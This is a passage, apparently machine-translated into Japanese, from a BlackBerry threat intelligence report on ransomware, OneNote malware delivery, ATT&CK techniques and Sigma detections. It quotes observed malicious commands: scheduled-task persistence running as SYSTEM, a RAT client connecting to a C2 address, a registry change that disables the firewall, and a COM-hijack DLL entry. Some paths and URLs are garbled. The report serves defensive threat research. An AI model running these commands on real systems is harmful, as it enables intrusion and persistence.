- 2022年12月25日、このグループはポルトガル最大級の港であるリスボン港管理局(APL)に対して攻撃を開始した。
- 2023年1月27日、研究者45はLockBit Greenと名付けられた新しい亜種に関する情報を共有しました。その直後、他の研究者は、この新しい亜種がContiベースの流出したソースコードを使用していることを突き止めました。
- 2月上旬、このランサムウェアグループは、ロイヤルメール(英国の多国籍郵便サービス)に対する攻撃の背後にいると主張し、データを漏洩サイトで公開すると述べた。流出サイトは2023年2月23日に公開され、2023年3月下旬の時点でもデータは公開されていた。
Microsoft OneNoteの悪用
かつて脅威者は、感染したマクロを含むMicrosoft®Office文書を頻繁に配布し、被害者が文書を開くと自動的にマクロが実行されるようにしていました。2022年半ば、マイクロソフトはOfficeマクロの自動実行を無効化し、こうした攻撃は成功しにくくなりました。その結果、脅威当事者は、一般的なワークプレイスソフトウェアを悪用する新たな方法を探しました。
この報告期間中、マルウェアやランサムウェアの配布に、Microsoft® OneNote の添付ファイル46(Office365®スイートのデジタルノートアプリケーション)が使用されるケースが急増しています。攻撃者は、Windows 実行可能ファイル、バッチファイル、Visual Basic スクリプト、HTML アプリケーションファイルなどのペイロードを含む OneNote の添付ファイルをフィッシングやマルスパムキャンペーンに追加します。
被害者が悪意のあるOneNoteの添付ファイルを開くと、感染の次の段階が発生し、一般的なコモディティマルウェアが頻繁にダウンロードされ、展開されます。OneNoteの添付ファイルを悪用することが知られている脅威主体には、Agent Tesla、AsyncRAT、IcedID、FormBook、RemcosRAT、RedLine、Qakbotなどがあります。
MITREの共通テクニック
技術名 | テクニックID | 戦術 |
---|---|---|
システム情報の発見
|
T1082
|
ディスカバリー
|
プロセス・インジェクション
|
T1055
|
防御回避
|
仮想化/サンドボックス回避
|
T1497
|
防御回避
|
セキュリティ・ソフトウェアの発見
|
T1518.001
|
ディスカバリー
|
マスカレード
|
T1036
|
防御回避
|
リモート・システム・ディスカバリー
|
T1018
|
ディスカバリー
|
アプリケーション層プロトコル
|
T1071
|
指揮統制
|
ファイルとディレクトリの検出
|
T1083
|
ディスカバリー
|
非アプリケーション層プロトコル
|
T1095
|
指揮統制
|
プロセス・ディスカバリー
|
T1057
|
ディスカバリー
|
DLLサイドローディング
|
T1574.002
|
永続性
|
コマンドとスクリプトのインタープリター
|
T1059
|
実行
|
入力キャプチャ
|
T1056
|
コレクション
|
ソフトウェア梱包
|
T1027.002
|
防御回避
|
ツールの無効化または変更
|
T1562.001
|
防御回避
|
ルンドル32
|
T1218.011
|
防御回避
|
暗号化チャンネル
|
T1573
|
指揮統制
|
難読化されたファイルまたは情報
|
T1027
|
防御回避
|
レジストリの実行キー/スタートアップフォルダ
|
T1547.001
|
永続性
|
アプリケーション・ウィンドウの発見
|
T1010
|
ディスカバリー
|
テクニックID | |
---|---|
システム情報の発見 |
T1082
|
プロセス・インジェクション |
T1055
|
仮想化/サンドボックス回避 |
T1497
|
セキュリティ・ソフトウェアの発見 |
T1518.001
|
マスカレード |
T1036
|
リモート・システム・ディスカバリー |
T1018
|
アプリケーション層プロトコル |
T1071
|
ファイルとディレクトリの検出 |
T1083
|
非アプリケーション層プロトコル |
T1095
|
プロセス・ディスカバリー |
T1057
|
DLLサイドローディング |
T1574.002
|
コマンドとスクリプトのインタープリター |
T1059
|
入力キャプチャ |
T1056
|
ソフトウェア梱包 |
T1027.002
|
ツールの無効化または変更 |
T1562.001
|
ルンドル32 |
T1218.011
|
暗号化チャンネル |
T1573
|
難読化されたファイルまたは情報 |
T1027
|
レジストリの実行キー/スタートアップフォルダ |
T1547.001
|
アプリケーション・ウィンドウの発見 |
T1010
|
戦術 | |
---|---|
システム情報の発見 |
ディスカバリー
|
プロセス・インジェクション |
防御回避
|
仮想化/サンドボックス回避 |
防御回避
|
セキュリティ・ソフトウェアの発見 |
ディスカバリー
|
マスカレード |
防御回避
|
リモート・システム・ディスカバリー |
ディスカバリー
|
アプリケーション層プロトコル |
指揮統制
|
ファイルとディレクトリの検出 |
ディスカバリー
|
非アプリケーション層プロトコル |
指揮統制
|
プロセス・ディスカバリー |
ディスカバリー
|
DLLサイドローディング |
永続性
|
コマンドとスクリプトのインタープリター |
実行
|
入力キャプチャ |
コレクション
|
ソフトウェア梱包 |
防御回避
|
ツールの無効化または変更 |
防御回避
|
ルンドル32 |
防御回避
|
暗号化チャンネル |
指揮統制
|
難読化されたファイルまたは情報 |
防御回避
|
レジストリの実行キー/スタートアップフォルダ |
永続性
|
アプリケーション・ウィンドウの発見 |
ディスカバリー
|
検出技術
BlackBerry Threat Research and Intelligence チームは、すべての侵入を詳細に分析し、ファイルイベントやレジストリキーの変更、プロセス、パーミッション、実行可能ファイル、スケジュールされたタスク、サービス、その他あらゆる要素を含む OS のアクティビティに関する情報を収集します。
チームは、Cylance Endpoint Security ソリューションが停止したサンプルのすべての動作を、公開されているシグマ・ルール47 にマッピングしました。図 6 は、この報告期間中にサンプルの実行中にアクティブ化されたシグマ・ルールの上位 10 個を示し、その後に各シグマ・ルールと関連する MITRE ATT&CK テクニックおよび戦術について説明しています。
シグマ・ルール | 説明 | MITRE ATT&CK テクニック | MITRE ATT&CK タクティクス |
---|---|---|---|
実行ファイルによる実行ファイルの作成
|
他の実行ファイルによる実行ファイルの作成を検出する。
|
能力を開発する:マルウェア - T1587.001
|
資源開発
|
Wow6432Node CurrentVersion オートランキーの変更
|
レジストリの自動開始拡張ポイント(ASEP)の変更を検出する。
|
ブートまたはログオン時の自動起動の実行:レジストリの実行キー / スタートアップフォルダ - T1547.001
|
永続性
|
Sysnativeフォルダを使用したプロセス作成
|
Sysnative フォルダを使用するプロセス作成イベントを検出 (Cobalt Strike のスポーンに共通)
|
プロセス・インジェクション - T1055
|
防御回避
|
特権を持つユーザーのログオン
|
管理者グループまたは権限と同様の特別なグループまたは権限を持つユーザーのログオンを検出します。
|
有効なアカウント - T1078
|
特権のエスカレーション
|
不審なフォルダからのプロセス開始
|
通常使用されない、またはほとんど使用されないディレクトリでのプロセス開始を検出します。
|
ユーザー実行 - T1204
|
実行
|
CurrentVersionオートランキーの変更
|
レジストリの自動開始拡張ポイント(ASEP)の変更を検出する。
|
ブートまたはログオン時の自動起動の実行:レジストリの実行キー / スタートアップフォルダ - T1547.001
|
永続性
|
レジストリからMicrosoft Defender Firewallを無効にする
|
ネットワーク利用を制限する制御をバイパスするために、システムのファイアウォールを無効にしたり、変更したりすることを検知する。
|
防御の障害:システムファイアウォールの無効化または変更 - T1562.004
|
防御回避
|
PowerShell スケジュールタスクの作成
|
Windows タスクスケジューラを悪用して、悪意のあるコードの初期実行または反復実行をスケジュールする可能性を検出します。
|
スケジュールされたタスク/ジョブスケジュールされたタスク - T1053.005
|
永続性
|
オーディナルによる不審な電話
|
rundll32.dllエクスポート内のDLLの不審な呼び出しを順序値で検出します。
|
システムバイナリのプロキシ実行:Rundll32 - T1218.011
|
防御回避
|
Windowsサービスの停止
|
停止するWindowsサービスを検出する
|
サービス・ストップ - T1489
|
インパクト
|
説明 | |
---|---|
実行ファイルによる実行ファイルの作成 |
他の実行ファイルによる実行ファイルの作成を検出する。
|
Wow6432Node CurrentVersion オートランキーの変更 |
レジストリの自動開始拡張ポイント(ASEP)の変更を検出する。
|
Sysnativeフォルダを使用したプロセス作成 |
Sysnative フォルダを使用するプロセス作成イベントを検出 (Cobalt Strike のスポーンに共通)
|
特権を持つユーザーのログオン |
管理者グループまたは権限と同様の特別なグループまたは権限を持つユーザーのログオンを検出します。
|
不審なフォルダからのプロセス開始 |
通常使用されない、またはほとんど使用されないディレクトリでのプロセス開始を検出します。
|
CurrentVersionオートランキーの変更 |
レジストリの自動開始拡張ポイント(ASEP)の変更を検出する。
|
レジストリからMicrosoft Defender Firewallを無効にする |
ネットワーク利用を制限する制御をバイパスするために、システムのファイアウォールを無効にしたり、変更したりすることを検知する。
|
PowerShell スケジュールタスクの作成 |
Windows タスクスケジューラを悪用して、悪意のあるコードの初期実行または反復実行をスケジュールする可能性を検出します。
|
オーディナルによる不審な電話 |
rundll32.dllエクスポート内のDLLの不審な呼び出しを順序値で検出します。
|
Windowsサービスの停止 |
停止するWindowsサービスを検出する
|
MITRE ATT&CK テクニック | |
---|---|
実行ファイルによる実行ファイルの作成 |
能力を開発する:マルウェア - T1587.001
|
Wow6432Node CurrentVersion オートランキーの変更 |
ブートまたはログオン時の自動起動の実行:レジストリの実行キー / スタートアップフォルダ - T1547.001
|
Sysnativeフォルダを使用したプロセス作成 |
プロセス・インジェクション - T1055
|
特権を持つユーザーのログオン |
有効なアカウント - T1078
|
不審なフォルダからのプロセス開始 |
ユーザー実行 - T1204
|
CurrentVersionオートランキーの変更 |
ブートまたはログオン時の自動起動の実行:レジストリの実行キー / スタートアップフォルダ - T1547.001
|
レジストリからMicrosoft Defender Firewallを無効にする |
防御の障害:システムファイアウォールの無効化または変更 - T1562.004
|
PowerShell スケジュールタスクの作成 |
スケジュールされたタスク/ジョブスケジュールされたタスク - T1053.005
|
オーディナルによる不審な電話 |
システムバイナリのプロキシ実行:Rundll32 - T1218.011
|
Windowsサービスの停止 |
サービス・ストップ - T1489
|
MITRE ATT&CK タクティクス | |
---|---|
実行ファイルによる実行ファイルの作成 |
資源開発
|
Wow6432Node CurrentVersion オートランキーの変更 |
永続性
|
Sysnativeフォルダを使用したプロセス作成 |
防御回避
|
特権を持つユーザーのログオン |
特権のエスカレーション
|
不審なフォルダからのプロセス開始 |
実行
|
CurrentVersionオートランキーの変更 |
永続性
|
レジストリからMicrosoft Defender Firewallを無効にする |
防御回避
|
PowerShell スケジュールタスクの作成 |
永続性
|
オーディナルによる不審な電話 |
防御回避
|
Windowsサービスの停止 |
インパクト
|
シグマ・ルール実行可能ファイルによる実行可能ファイルの作成
Sysmon Event ID 11 FileCreateに関連するこの攻撃は、別の.exeファイルによって.exeファイルが作成されるというものです。観察されたバイナリが作成されたパスの一部は以下のとおりです:
> C:\Users\<user>\AppData\Local\Temp\
> C:\Users\<user>\Desktop\
> C:\Users\<user>\Downloads\
> C:\<custom_path>\
> C:³ Files
シグマルールWow6432Node CurrentVersion オートランキーの変更
Sysmon Event ID 13 Registry Value Setに関連するこの攻撃には、レジストリ内の自動起動拡張ポイント(ASEP)の変更が含まれます。主な自動実行レジストリキーは以下のとおりです:
- HKEY_CURRENT_USER
- HKEY_CURRENT_USER
- HKEY_LOCAL_MACHINE
- HKEY_LOCAL_MACHINE
自動実行キーは、既存のWindowsアイテムと似た名前で作成することができる。例としては以下のようなものがある:
- ウィンドウズ設定
- マイクロソフトWindowsドライバ
- エクスプローラー
- Windowsサービスのホストプロセス
侵入の種類(特定のパスでのバイナリの実行やAppDataフォルダ内のスクリプトなど)によって、レジストリキーの値が異なる場合があります。
シグマのルールレジストリ経由でMicrosoft Defenderファイアウォールを無効にする
Sysmon Event ID 13 Registry Value Setに関連するこれらの攻撃は、PowerShell、reg.exe、またはAPI Callsなどのツールを使用して、Microsoft Windows Defenderを無効にするためにレジストリを変更します。これを達成するために、脅威行為者は特定の値で次のレジストリキーを変更します。例えば
- >HKLM System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\EnableFirewall
- > DWORD (0x00000000)
その他の脅威行動
プロセス: cmd.exe
この脅威の動作は、cmd.exeを使用して、同じ感染内で7つの異なるサブプロセスを起動します。
- sc.exe(起動と問い合わせのために2回起動される)
- ピングエグゼ
- findstr.exe
- schtasks.exe(削除、作成、実行のために3回起動される)
以下は、cmd.exeを悪用する悪質なコードの例です。
> cmd /c start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&(schtasks /delete /TN Ddrivers /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Ddrivers /tr ┣"cmd.exe /c c:┣Windows┣SysWOW64┣drivers┣svchost.exe"&schtasks /run /TN Ddrivers)
プロセス: cvtres.exe
この脅威の動作は、RATクライアントを使用してサーバーへの接続を確立します。以下は、cvtres.exeを悪用する悪質なコードの例です:
> ¦"C:¦Windows¦Microsoft.NET¦Framework¦v4.0.30319¦cvtres.exe" HiddenEyeZ_Client 191.101.30[.]201 8880 NmWblLaOd
プロセスAutoIt3.exe
この脅威の動作は、AutoIt3.exe(AutoIt v3スクリプト言語のコンポーネント)を使用して、悪意のある目的を持つスクリプトを実行します。たとえば、COMハイジャック(正規のシステムコンポーネントへの参照を悪意のあるコードへの参照に置き換える)によって永続性を実現しようとするAutoItスクリプト(一般的に.au3拡張子を使用)が確認されています。脅威当事者は、COMハイジャックを使用して、悪意のあるDLLを含む新しいエントリを作成し、そのエントリが後で実行されるようにします。例えば
- > レジストリ SetValue
- > HKCR\\CLSID\\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\\InprocServer32\\(Default)
- > C:\\Users\\<user>\\AppData\\Local\\Temp\\JSAMSIProvider64.dll
予想
予想の再検討
我々の予想
ロシアのウクライナ侵攻の主な特徴は、ウクライナの軍事・民間インフラに対するサイバー攻撃である。敵対行為が続けば、このような標的型サイバー攻撃のパターンが繰り返される可能性が高い。
成果だ:
ウクライナ紛争が続く中、同地域のデジタルおよび物理的な重要インフラに対する攻撃も続いている。2022年11月のEUエネルギー相との会合48で、ウクライナのガルシュチェンコ・エネルギー相は、民間インフラの大部分が損傷または破壊され、攻撃が止んでいないことを示唆した。
我々の予想
病院や医療機関を標的にした攻撃を含むランサムウェア作戦は、特にウクライナを支援したり、ウクライナに資金を提供したりしている国々では今後も続くだろう。
成果だ:
今期もランサムウェア攻撃は続いているが、金銭的な動機以外のものは不明である。著名なランサムウェア・グループであるLockBitは、この報告期間に活発に活動し、合計1,500人以上の被害者を攻撃した可能性がある。このグループは、保健・医療組織を標的にすることに何の躊躇もないようで、被害者の中には米国を拠点とする医療プロバイダーも含まれていた。
また、BlackCatランサムウェアの運営者による攻撃も増加しており、主に米国を拠点とする被害者を標的としています。さらに、ESXiArg ランサムウェアは、パッチの適用されていない脆弱なシステム数百台に影響を及ぼし、この報告期間中に懸念の原因となりました。
我々の予想
重要インフラへのサイバー攻撃は今後も続くだろう。AIは攻撃の自動化だけでなく、高度なディープフェイク攻撃の開発にもますます利用されるようになるかもしれない。
成果だ:
重要なインフラストラクチャは、常に金銭的および政治的な動機に基づく脅威行為者のターゲットであり、全体的な脅威の状況におけるディープフェイクの使用は、重要な牽引力となっています。BlackBerry Threat Research and Intelligenceチームは、マルウェアが混入されたクラックされたソフトウェアを宣伝するために、ディープフェイクや類似の策略を活用する複雑な暗号通貨詐欺を観察してきました。
新規・更新予想
ウクライナに対するサイバー攻撃の継続的増加
紛争が続く中、ウクライナに対するサイバー攻撃も続くだろう。ウクライナ国家サイバー保護センターは、2022年を通じてサイバー攻撃49が前年比で約3倍に増加し、ロシアを拠点とするIPアドレスを発信元とする攻撃が26%50と大幅に増加したと報告している。
2023年1月、ESETは、悪名高いSandworm Groupに起因するSwiftSlicerと名付けられた新しいマルウェアワイパーを文書化しました。このGolangでコンパイルされたマルウェアは、ワイパーの長いライン51の中で最新のもので、ターゲット・ネットワーク上に展開されるとデータを破壊します。
サイバー攻撃はロシアの軍事作戦の要素としてよく知られている52 ので、ウクライナに対する攻撃は今後も続く可能性が高い。
サイバー犯罪者によるChatGPTの悪用
対話型AIチャットボットChatGPT53は、2022年11月に世界中でリリースされた。サイバー犯罪者がChatGPTを詐欺や基本的なマルウェアの作成に使用する可能性をテストし、議論しているという最初の報告54が2022年12月に始まりました。2023年1月には、研究者55が、ChatGPTがポリモーフィック機能を備えた複雑な悪意のあるコードを作成できることを実証しました。
ChatGPTのようなAIを搭載したボットがより高度で一般的になるにつれ、その機能が悪意のある目的に悪用されることは避けられません。このような増大する脅威に対する防御には、予防と検出の機能だけでなく、効果的な脅威インテリジェンスが必要です。
サプライチェーンへの攻撃は脅威であり続ける
この報告期間では、製造業と医療業界を狙った商品マルウェアによる攻撃が大半を占めました。これらのコモディティ情報窃取ツールは、データ窃取や、ネットワーク侵入を容易にするためのアクセス認証情報を取得するためのツールとして使用されていました。この種のアクセスは、IABサービスを通じて頻繁に販売されており、情報窃取者のログは、しばしばアンダーグラウンドのマーケットプレイスで販売されています。多くの場合、侵入に成功すると、ランサムウェアの展開など、最初の侵入の影響を増幅させるような後続の攻撃が発生する。
セキュリティへの取り組みが強化されているにもかかわらず、サプライチェーン・パートナーを標的としたサイバー攻撃は、今後3カ月間も重大な脅威であり続けるだろう。すべての業界がサプライチェーン攻撃のリスクにさらされている一方で、製造業は、金融資産、特許、その他の知的財産を有するため、金銭的動機に基づく脅威行為者や国家に支援された行為者にとって特に魅力的な標的である。
自動車業界のサプライチェーンを標的とした最近のランサムウェア攻撃は、こうした攻撃が製造業全体に及ぼす潜在的な影響を示している。サプライチェーンの混乱は、標的となった企業だけでなく、業界のバリューチェーンにある他のすべての組織やシステムに影響を及ぼす。
ランサムウェアの展開を容易にするためにIABを利用するのと同様に、サプライチェーン攻撃は今後も続くと予想される。
結論
2023年の最初の数カ月は、既知の脅威の展開が増加するだけでなく、重要な新たな脅威が導入された。手ごろな価格の RaaS や MaaS により、初心者が脅威の担い手となりやすい状況が続いています。同時に、以前には見られなかったマルウェアのサンプル数が、前回の報告期間から50%増加しました。SEOポイズニングのような手法が広まりつつあり、ChatGPTのリリースは、AIが生成するマルウェアの脅威を前進させる画期的な出来事です。あらゆる業界、あらゆる種類のテクノロジーにおいて、脅威の状況はこれまでになく急速に拡大しています。この報告期間中に得られた主な成果と教訓は以下のとおりです:
- ヘルスケアのデジタル化が進むにつれ、医療従事者にとってデバイスの安全確保と患者データの保護が急務となっている。時代遅れの安全でないインフラは脆弱性を生み、新しいテクノロジーはさらなるセキュリティ対策を必要とするリスクをもたらす可能性があります。デジタル化の進展に伴い、医療機器メーカー、ソフトウェア・ソリューション・プロバイダー、医療提供者を含む医療業界は、規制要件を満たし、患者データを保護するために、インフラ全体のサイバーセキュリティを優先する必要があります。
- コモディティ型マルウェアは、低コストや無償など、さまざまな価格帯で提供されており、爆発的な成長を遂げています。その結果、あらゆる業界が、データの窃取、バックドアの作成、恐喝スキームの実行などを可能にする強力なコモディティ型不正プログラムの標的となっています。コモディティマルウェアは、さまざまなAPTグループ56によって広く使用されているため、特定のキャンペーンやインシデントを特定の脅威行為者に帰属させることはますます難しくなっています。防御者は、常に警戒を怠らず、一般的なコモディティマルウェアの全ファミリに対応する適切な追跡および監視の枠組みを確実に構築する必要があります。このフレームワークと適切なレイヤー防御メカニズムを組み合わせることで、組織を最大限に保護することができます。
- 今報告期間中に最も標的となったのは、世界的な金融、ヘルスケア、食品・生活必需品小売業界の顧客である。これらの業界は必要不可欠なサービスを提供しており、そのエコシステムに何らかの障害が発生した場合、その地域だけでなく、地域、国、世界全体に波及する深刻な事態に発展する可能性がある。デジタルトランスフォーメーションが進み、業界内および業界間の相互接続性が高まっているため、リスクはさらに高まっている。
この急速に変化する環境において、マルウェアやサイバー攻撃から組織を守るには、以下の両方が必要である:
- 既知および未知の脅威を認識し、プロアクティブにブロックすることが実証されている高度なAIベースの検出と応答。
- 脅威行為者がお客様の業界を標的にする方法、脅威行為者が使用するツール、脅威行為者の動機について、詳細かつ正確なインテリジェンスを提供します。この文脈的、予測的、実行可能なサイバー脅威インテリジェンスは、組織に対する脅威の影響を軽減するのに役立ちます。
BlackBerry は、AI ベースの検知と対応、サイバー脅威インテリジェンスを含む包括的なサイバーセキュリティを提供します。当社のAI主導型ソリューションからの遠隔測定に基づき、他の公的および私的なインテリジェンスソースによって補完されたグローバルなBlackBerry Threat Research and Intelligenceチームは、攻撃、脅威行為者、悪意のあるキャンペーンに関する実用的な洞察を提供し、情報に基づいた意思決定と迅速な行動をサポートすることで、ビジネスの混乱を解消します。
リソース
妥協の公的指標
パブリックルール
MITREの共通テクニック
MITRE D3FEND 対策
参考文献
1 https://intel471.com/blog/privateloader-malware
2 https://www.darkreading.com/risk/breaking-down-the-propagate-code-injection-attack
3 https://www.semrush.com/blog/black-hat-seo/
5 https://attack.mitre.org/groups/G0127/
7 https://cert.gov.ua/article/405538
8 https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp
9 https://www.proofpoint.com/当社/blog/threat-insight/charting-ta2541s-flight
11 https://cybernews.com/news/silverstone-formula-one-ransomware/
12 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527
13 https://www.ic3.gov/Media/News/2022/220420.pdf
14 https://www.developer.com/news/90-of-the-public-cloud-runs-on-linux/
15 https://www.interpol.int/en/Crimes/Cybercrime/Cryptojacking
16 https://blogs.juniper.net/en-当社/threat-research/dota3-is-your-internet-of-things-device-moonlighting
17 https://github.com/xmrig/xmrig
18 https://therecord.media/sysrv-a-new-crypto-mining-botnet-is-silently-growing-in-the-shadows
19 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35914
20 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034
22 https://www.hhs.gov/sites/default/files/the-return-of-emotet.pdf
23 https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf
24 https://www.hhs.gov/sites/default/files/royal-blackcat-ransomware-tlpclear.pdf
25 https://www.pcrisk.com/removal-guides/22190-mallox-ransomware
26 https://community.riskiq.com/article/d8b749f2
27 https://malpedia.caad.fkie.fraunhofer.de/actor/toddycat
28 https://blog.cyble.com/2023/03/21/notorious-sidecopy-apt-group-sets-sights-on-indias-drdo/
29 https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia
32 https://www.cbc.ca/news/politics/ukraine-energy-minister-interview-rbl-1.6759503
33 https://www.weforum.org/agenda/2022/10/europe-is-energy-sector-resilience-cyber-risk/
36 https://www.politico.com/news/2023/02/14/russia-malware-electric-gas-facilities-00082675
37 https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/
40 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21974
41 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0199
42 https://attack.mitre.org/groups/G0099/
43 https://therecord.media/alphv-blackcat-posted-data-ireland-munster-technical-university/
47 https://github.com/SigmaHQ/sigma
50 https://cert.gov.ua/article/3718487
51 https://www.welivesecurity.com/2023/02/24/year-wiper-attacks-ukraine/
53 https://openai.com/blog/chatgpt
54 https://research.checkpoint.com/2023/opwnai-cybercriminals-starting-to-use-chatgpt/
56 https://threatpost.com/apt-commodity-rats-microsoft-bug/175601/
本レポートのデータはBlackBerry Cybersecurity telemetryによって作成されたものであり、BlackBerry Limitedの所有物である。